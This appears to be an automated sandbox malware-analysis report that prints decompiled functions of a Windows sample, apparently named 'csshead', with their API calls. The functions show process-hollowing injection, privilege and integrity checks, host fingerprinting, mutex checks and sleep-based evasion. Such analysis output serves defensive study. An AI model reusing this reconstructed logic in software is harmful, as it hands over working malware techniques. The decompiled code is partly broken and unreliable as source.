RtlEncodePointer.NTDLL(?,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 0042492B
RtlEncodePointer.NTDLL(-00000004,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 00424933

Strings

@G@, xrefs: 00424897

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00409347, Relevance: 9.1, APIs: 6, Instructions: 82

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00409347() {
				void* _t16;
				intOrPtr _t24;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t42;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t51;

				_t16 =  *_t49(); // executed
				if(_t16 != 0) {
					 *_t47(0);
				}
				if(E0040453C(GetCurrentProcess()) == 0) {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					E0040133C(_t51 - 0x218, 0x40946c);
				} else {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					_t42 =  *0x40a0b0; // 0x401c64
					E0040133C(_t51 - 0x218, _t42);
				}
				_t24 =  *0x40a08c; // 0x401c00
				E0040133C(_t51 - 0x218, _t24);
				_t29 = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0); // executed
				 *((intOrPtr*)(_t51 - 0xc)) = _t29;
				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
					 *0x40b21c(0, _t51 - 0x218, 0x26, 0xffffffff);
					_t32 =  *0x40a0dc; // 0x401ce8
					E0040133C(_t51 - 0x218, _t32);
					if(PathFileExistsA(_t51 - 0x218) != 0) {
						 *((intOrPtr*)(_t51 - 0xc)) = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0);
					}
				}
				ExitProcess(0);
			}

0x00409347
0x0040934c
0x00409350
0x00409352
0x00409366
0x0040939d
0x004093af
0x00409368
0x00409374
0x0040937a
0x00409387
0x0040938c
0x004093b7
0x004093c4
0x004093e8
0x004093f0
0x004093f7
0x00409406
0x0040940c
0x00409419
0x00409430
0x00409456
0x00409456
0x00409430
0x0040945b

APIs

GetCurrentProcess.KERNEL32 ref: 00409359

Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F

GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 00409374
GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 0040939D

Part of subcall function 00405028: GetModuleHandleA.KERNEL32(00000000), ref: 00405040
Part of subcall function 00405028: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
Part of subcall function 00405028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
Part of subcall function 00405028: MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
Part of subcall function 00405028: GetThreadContext.KERNEL32(?,00010007), ref: 00405209
Part of subcall function 00405028: VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
Part of subcall function 00405028: WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
Part of subcall function 00405028: ResumeThread.KERNELBASE(?), ref: 0040527E
Part of subcall function 00405028: WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
Part of subcall function 00405028: GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052BE
Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052C8

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00409406
PathFileExistsA.SHLWAPI(?), ref: 00409428
ExitProcess.KERNEL32 ref: 0040945B

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00407C4E, Relevance: 9.1, APIs: 6, Instructions: 66
file

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407C4E(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;
				void* _t24;

				_v8 = __eax;
				_v12 = 0;
				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t24;
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}

0x00407c56
0x00407c5b
0x00407c71
0x00407c77
0x00407c7e
0x00407c99
0x00407c99
0x00407ca0
0x00407cb2
0x00407cc7
0x00407cdd
0x00407ce7
0x00407cf0
0x00407cf0
0x00407cf9

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
CloseHandle.KERNEL32(000000FF), ref: 00407CE7

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00407C50, Relevance: 9.1, APIs: 6, Instructions: 65
file

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407C50(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;
				void* _t24;

				_v8 = __eax;
				_v12 = 0;
				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t24;
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}

0x00407c56
0x00407c5b
0x00407c71
0x00407c77
0x00407c7e
0x00407c99
0x00407c99
0x00407ca0
0x00407cb2
0x00407cc7
0x00407cdd
0x00407ce7
0x00407cf0
0x00407cf0
0x00407cf9

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
CloseHandle.KERNEL32(000000FF), ref: 00407CE7

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00404A68, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00404A68(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				int _t30;
				char* _t32;
				intOrPtr _t37;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				signed int _t52;
				signed char _t62;
				intOrPtr _t67;

				_v8 = __eax;
				_v12 = 0;
				_v16 = 0x81;
				_t30 = GetComputerNameA( &_v153,  &_v16);
				_t72 = _t30;
				if(_t30 != 0) {
					_v12 = E00401740( &_v153);
				}
				_t32 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24); // executed
				_v16 = 4;
				_v20 = 0;
				_t37 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v24, _t37, 0, 0,  &_v20,  &_v16); // executed
				E00403890(_v24);
				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
				E00401164(_v12,  &_v153);
				 *0x40a064 = E004044F0(_t72);
				_t48 = GetCurrentProcess(); // executed
				_t49 = E004042D4(_t48); // executed
				 *0x40a068 = _t49;
				if(E004044F0(_t72) >= 0x3c) {
					_t51 = GetCurrentProcess(); // executed
					_t52 = E004042D4(_t51); // executed
					__eflags = _t52 - 3;
					_t21 = _t52 == 3;
					__eflags = _t21;
					asm("sbb eax, eax");
					 *0x40a034 =  ~(_t52 & 0xffffff00 | _t21);
				} else {
					_t62 = E004041CC();
					asm("sbb eax, eax");
					 *0x40a034 =  ~_t62;
				}
				if( *0x40a034 != 0) {
					_t67 =  *0x40a09c; // 0x401c30
					E00401308(_v8, _t67);
				}
				E0040133C(_v8, 0x404b9c);
				return E0040133C(_v8,  &_v153);
			}

0x00404a71
0x00404a76
0x00404a79
0x00404a8b
0x00404a91
0x00404a93
0x00404aa0
0x00404aa0
0x00404aae
0x00404ab9
0x00404abf
0x00404ac8
0x00404ad7
0x00404ae1
0x00404aec
0x00404afc
0x00404b08
0x00404b12
0x00404b17
0x00404b1d
0x00404b22
0x00404b2f
0x00404b41
0x00404b47
0x00404b4c
0x00404b4f
0x00404b4f
0x00404b54
0x00404b56
0x00404b31
0x00404b31
0x00404b38
0x00404b3a
0x00404b3a
0x00404b62
0x00404b64
0x00404b6d
0x00404b6d
0x00404b7b
0x00404b99

APIs

GetComputerNameA.KERNEL32(?,00000081), ref: 00404A8B
RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00404AB9

Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC

Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D

Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A

GetCurrentProcess.KERNEL32 ref: 00404B17

Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3

GetCurrentProcess.KERNEL32 ref: 00404B41

Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE

Strings

t!@, xrefs: 00404AAE

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00409230, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00409230(intOrPtr* __ebx, intOrPtr* __ecx) {
				void* _t8;
				void* _t11;
				int _t12;
				void* _t13;
				CHAR* _t14;
				void* _t22;
				intOrPtr _t24;
				void* _t25;

				_t8 =  *__ecx(); // executed
				if(_t8 != 0) {
					_push(0);
					 *__ebx();
				}
				_pop(_t22);
				_pop(_t19);
				_t24 =  *0x40a0a8; // 0x401c4c
				_t11 = E00401110( *((intOrPtr*)(_t25 - 4)), _t24);
				_t29 = _t11;
				if(_t11 == 0) {
					 *((char*)(_t25 - 0x116)) = 0x2d;
				} else {
					 *((char*)(_t25 - 0x116)) = 0x2b;
					Sleep(0x3a98);
				}
				_t12 = E00406E04(_t22, _t29);
				if(_t12 == 0) {
					if( *((char*)(_t25 - 0x116)) != 0x2d) {
						L9:
						_push(_t12);
						_push(_t22); // executed
						_t13 = E004069BC(_t24, _t32); // executed
						_t12 = _t13 + E004092CD;
						goto __eax; // executed
					}
					_t14 =  *0x40a0d8; // 0x401cc8
					_t12 = OpenMutexA(0x100000, 0, _t14);
					 *(_t25 - 8) = _t12;
					_t32 =  *(_t25 - 8);
					if( *(_t25 - 8) == 0) {
						goto L9;
					}
					_t12 = CloseHandle( *(_t25 - 8));
					ExitProcess(0);
				}
				return _t12;
			}

0x00409230
0x00409235
0x00409237
0x00409239
0x0040923b
0x0040923f
0x00409240
0x00409242
0x0040924b
0x00409250
0x00409252
0x00409268
0x00409254
0x00409254
0x00409260
0x00409260
0x0040926f
0x00409276
0x00409283
0x004092b3
0x004092b3
0x004092b5
0x004092b6
0x004092bb
0x004092cb
0x004092cb
0x00409285
0x00409292
0x00409298
0x0040929b
0x0040929f
0x00000000
0x00000000
0x004092a5
0x004092ad
0x004092ad
0x00409464

APIs

Sleep.KERNEL32(00003A98), ref: 00409260

Part of subcall function 00406E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 00406E26
Part of subcall function 00406E04: CharUpperBuffA.USER32(?,000001F5), ref: 00406E37

OpenMutexA.KERNEL32(00100000,00000000,00401CC8), ref: 00409292
CloseHandle.KERNEL32(00000000), ref: 004092A5
ExitProcess.KERNEL32 ref: 004092AD

Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1

Strings

-, xrefs: 0040927C

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042CDE6, Relevance: 7.6, APIs: 5, Instructions: 72

C-Code - Quality: 100%

			E0042CDE6() {
				int _v8;
				int _v12;
				int _v16;
				WCHAR* _t9;
				int _t12;
				int _t13;
				char* _t15;
				char* _t16;
				WCHAR* _t21;

				_t9 = GetEnvironmentStringsW();
				_t21 = _t9;
				if(_t21 != 0) {
					if( *_t21 == 0) {
						L5:
						_t12 = (_t9 - _t21 >> 1) + 1;
						_v16 = _t12;
						_t13 = WideCharToMultiByte(0, 0, _t21, _t12, 0, 0, 0, 0);
						_v12 = _t13;
						if(_t13 == 0) {
							L10:
							FreeEnvironmentStringsW(_t21);
							_t15 = 0;
							L11:
							return _t15;
						}
						_t16 = E0042A0DF(_t13); // executed
						_v8 = _t16;
						if(_t16 == 0) {
							goto L10;
						}
						if(WideCharToMultiByte(0, 0, _t21, _v16, _t16, _v12, 0, 0) == 0) {
							E00422804(_v8);
							_v8 = 0;
						}
						FreeEnvironmentStringsW(_t21);
						_t15 = _v8;
						goto L11;
					} else {
						goto L3;
					}
					do {
						do {
							L3:
							_t9 =  &(_t9[1]);
						} while ( *_t9 != 0);
						_t9 =  &(_t9[1]);
					} while ( *_t9 != 0);
					goto L5;
				}
				return 0;
			}

0x0042cdf0
0x0042cdf6
0x0042cdfc
0x0042ce05
0x0042ce17
0x0042ce26
0x0042ce2b
0x0042ce2e
0x0042ce30
0x0042ce35
0x0042ce6f
0x0042ce70
0x0042ce76
0x0042ce78
0x00000000
0x0042ce78
0x0042ce38
0x0042ce3e
0x0042ce43
0x00000000
0x00000000
0x0042ce55
0x0042ce5a
0x0042ce60
0x0042ce60
0x0042ce64
0x0042ce6a
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ce07
0x0042ce07
0x0042ce07
0x0042ce07
0x0042ce0a
0x0042ce0f
0x0042ce12
0x00000000
0x0042ce07
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70

Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004047AC, Relevance: 7.6, APIs: 5, Instructions: 64
file

C-Code - Quality: 100%

			E004047AC(CHAR* __eax, void** __edx) {
				CHAR* _v8;
				void** _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t27;
				void* _t43;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0xffffffff;
				 *_v12 = 0;
				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v20 = _t27;
				if(_v20 == 0xffffffff) {
					_t43 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0); // executed
					_v20 = _t43;
				}
				if(_v20 != 0xffffffff) {
					_v24 = GetFileSize(_v20, 0);
					if(_v24 != 0) {
						E004013B4(_v12, _v24 + 1);
						ReadFile(_v20,  *_v12, _v24,  &_v28, 0);
						CloseHandle(_v20);
						_v16 = _v24;
					}
				}
				return _v16;
			}

0x004047b2
0x004047b5
0x004047b8
0x004047c4
0x004047d9
0x004047df
0x004047e6
0x004047fb
0x00404801
0x00404801
0x00404808
0x00404816
0x0040481d
0x00404826
0x0040483f
0x00404849
0x00404852
0x00404852
0x0040481d
0x0040485b

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
GetFileSize.KERNEL32(?,00000000), ref: 00404810

Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
CloseHandle.KERNEL32(?), ref: 00404849

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004092CD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35

C-Code - Quality: 37%

			E004092CD() {
				void* _t3;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				intOrPtr* _t21;
				void* _t24;
				void* _t25;

				_t3 =  *_t21();
				_t28 = _t3;
				if(_t3 != 0) {
					 *_t18(0);
				}
				_pop(_t22);
				_pop(_t19);
				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
				_t10 = E00407C50(_t25 - 0x117 + 2); // executed
				 *0x40a06c = _t10;
				_t11 =  *0x40a06c; // 0x5b392e46
				wsprintfA("1530474054", E00409468, _t11);
				_push(GetCursorPos(0x40a578));
				E004069BC(_t24, _t28); // executed
				goto __eax;
			}

0x004092cd
0x004092cf
0x004092d2
0x004092d6
0x004092d8
0x004092dc
0x004092dd
0x004092f0
0x004092ff
0x00409304
0x00409309
0x00409319
0x0040932d
0x00409330
0x00409345

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 004092F0

Part of subcall function 00407C50: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
Part of subcall function 00407C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
Part of subcall function 00407C50: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
Part of subcall function 00407C50: CloseHandle.KERNEL32(000000FF), ref: 00407CE7

wsprintfA.USER32 ref: 00409319
GetCursorPos.USER32(0040A578), ref: 00409327

Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1

Strings

1530474054, xrefs: 00409314

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406B70, Relevance: 6.1, APIs: 4, Instructions: 121
sleep

C-Code - Quality: 33%

			E00406B70(void* __ebx, intOrPtr* __ecx) {
				intOrPtr _v4;
				char _v28;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t50;
				void* _t55;
				intOrPtr _t56;
				void* _t57;
				intOrPtr* _t62;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				void* _t80;
				signed int _t86;
				signed int _t88;
				signed int _t90;
				intOrPtr* _t92;

				_t62 = __ecx;
				_t55 = __ebx;
				_t74 = __ecx;
				_t86 = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L6:
					return 1;
				} else {
					while(_t86 >= 0 && _t86 <  *((intOrPtr*)(_t74 + 8))) {
						_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 4)) + _t86 * 4));
						_t35 =  *((intOrPtr*)( *_t62 + 0x1c));
						Sleep(??); // executed
						if(_t35 == 0) {
							return 0;
						} else {
							_t86 = _t86 + 1;
							if(_t86 <  *((intOrPtr*)(_t74 + 8))) {
								continue;
							} else {
								goto L6;
							}
						}
						goto L30;
					}
					RaiseException(0xc000008c, 1, 0, 0);
					asm("int3");
					asm("int3");
					_push(_t86);
					_push(_t74);
					_t76 = _t62;
					_t88 = 0;
					if( *((intOrPtr*)(_t76 + 8)) <= 0) {
						L14:
						return _t35;
					} else {
						_push(_t55);
						_t56 = _v4;
						while(_t88 >= 0 && _t88 <  *((intOrPtr*)(_t76 + 8))) {
							_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 4)) + _t88 * 4));
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x20))))(_t56);
							_t88 = _t88 + 1;
							if(_t88 <  *((intOrPtr*)(_t76 + 8))) {
								continue;
							} else {
								goto L14;
							}
							goto L30;
						}
						RaiseException(0xc000008c, 1, 0, 0);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t56);
						_push(_t88);
						_push(_t76);
						_t78 = _t62;
						_t57 = 0;
						_t90 = 0;
						if( *((intOrPtr*)(_t78 + 8)) <= 0) {
							L20:
							return _t57;
						} else {
							while(_t90 >= 0 && _t90 <  *((intOrPtr*)(_t78 + 8))) {
								_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 4)) + _t90 * 4));
								_t50 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x18))))();
								_t90 = _t90 + 1;
								_t57 = _t57 + _t50;
								if(_t90 <  *((intOrPtr*)(_t78 + 8))) {
									continue;
								} else {
									goto L20;
								}
								goto L30;
							}
							RaiseException(0xc000008c, 1, 0, 0);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t90);
							_t92 = _t62;
							_t38 =  *_t92;
							_push(_t78);
							_t80 = _t38 - 0xc;
							if( *((intOrPtr*)(_t38 - 0xc)) > 1) {
								L25:
								if(L00402450(_t92,  *((intOrPtr*)(_t80 + 4)), _t38, 1,  &_v28) != 0 && _t80 !=  *0x440020) {
									_push(_t80);
									if( *0x4332a4() <= 0) {
										_push(_t80);
										L004221B4();
									}
								}
								return _t92;
							} else {
								_t64 =  *((intOrPtr*)(_t38 - 8));
								_t68 =  *((intOrPtr*)(_t38 - 4));
								_push(_t57);
								if( *((intOrPtr*)(_t38 - 8)) + 1 >  *((intOrPtr*)(_t38 - 4))) {
									goto L25;
								} else {
									E00401850(_t64 + _t38, _t68 + 1,  &_v28, 1);
									 *((intOrPtr*)( *_t92 - 8)) =  *((intOrPtr*)( *_t92 - 8)) + 1;
									 *((char*)( *_t92 +  *((intOrPtr*)( *_t92 - 8)))) = 0;
									return _t92;
								}
							}
						}
					}
				}
				L30:
			}

0x00406b70
0x00406b70
0x00406b72
0x00406b74
0x00406b79
0x00406ba0
0x00406ba7
0x00406b7b
0x00406b80
0x00406b8c
0x00406b91
0x00406b94
0x00406b98
0x00406bac
0x00406b9a
0x00406b9a
0x00406b9e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b9e
0x00000000
0x00406b98
0x00406bb8
0x00406bbe
0x00406bbf
0x00406bc0
0x00406bc1
0x00406bc2
0x00406bc4
0x00406bc9
0x00406bee
0x00406bf0
0x00406bcb
0x00406bcb
0x00406bcc
0x00406bd0
0x00406bdc
0x00406be5
0x00406be7
0x00406beb
0x00000000
0x00406bed
0x00000000
0x00406bed
0x00000000
0x00406beb
0x00406bfe
0x00406c04
0x00406c05
0x00406c06
0x00406c07
0x00406c08
0x00406c09
0x00406c0a
0x00406c0b
0x00406c0c
0x00406c0d
0x00406c0e
0x00406c0f
0x00406c10
0x00406c11
0x00406c12
0x00406c13
0x00406c15
0x00406c17
0x00406c1c
0x00406c3e
0x00406c43
0x00406c20
0x00406c20
0x00406c2c
0x00406c34
0x00406c36
0x00406c37
0x00406c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c3c
0x00406c4f
